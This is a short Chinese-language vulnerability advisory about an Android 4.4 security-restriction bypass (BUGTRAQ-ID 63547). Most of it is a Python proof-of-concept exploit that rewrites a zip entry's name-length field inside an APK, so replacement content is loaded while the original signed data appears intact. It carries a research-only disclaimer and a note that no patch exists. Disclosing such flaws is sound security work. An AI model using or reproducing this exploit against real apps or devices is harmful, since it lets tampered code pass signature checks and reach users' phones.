Android是基于Linux开放性内核的操作系统，是Google公司在2007年11月5日公布的手机操作系统。

Android 4.4及其他版本存在安全限制绕过漏洞，攻击者可利用此漏洞绕过某些安全限制以执行未授权操作。

 

BUGTRAQ-ID:63547

 

受影响系统：

Google Android

 

测试方法：

警  告！以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#!/usr/bin/python

 

import zipfile

import struct

import sys

 

# usage: ./pocB.py new.apk old.apk file data

zout = zipfile.ZipFile(sys.argv[1], "w")

zin = zipfile.ZipFile(sys.argv[2], "r")

replace = sys.argv[3]

new = open(sys.argv[4], \'r\').read()

 

fp = zout.fp

 

for name in zin.namelist():

    old = zin.read(name)

    if name != replace:

        zout.writestr(name, old, zipfile.ZIP_DEFLATED)

    else:

        assert len(new) <= len(old)

 

        # write header, old data, and record offset

        zout.writestr(name, old, zipfile.ZIP_STORED)

        offset = fp.tell()

 

        # return to name length, set to skip old data

        fp.seek(-len(old) -len(name) -4, 1)

        fp.write(struct.pack(\'<h\', len(name) + len(old)))

 

        # after old data, write new data \\0 padded

        fp.seek(offset)

        fp.write(new)

        fp.write(\'\\0\' * (len(old) - len(new)))

 

zout.close()

zin.close()

解决办法：暂无

厂商补丁：

Google

------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.google.com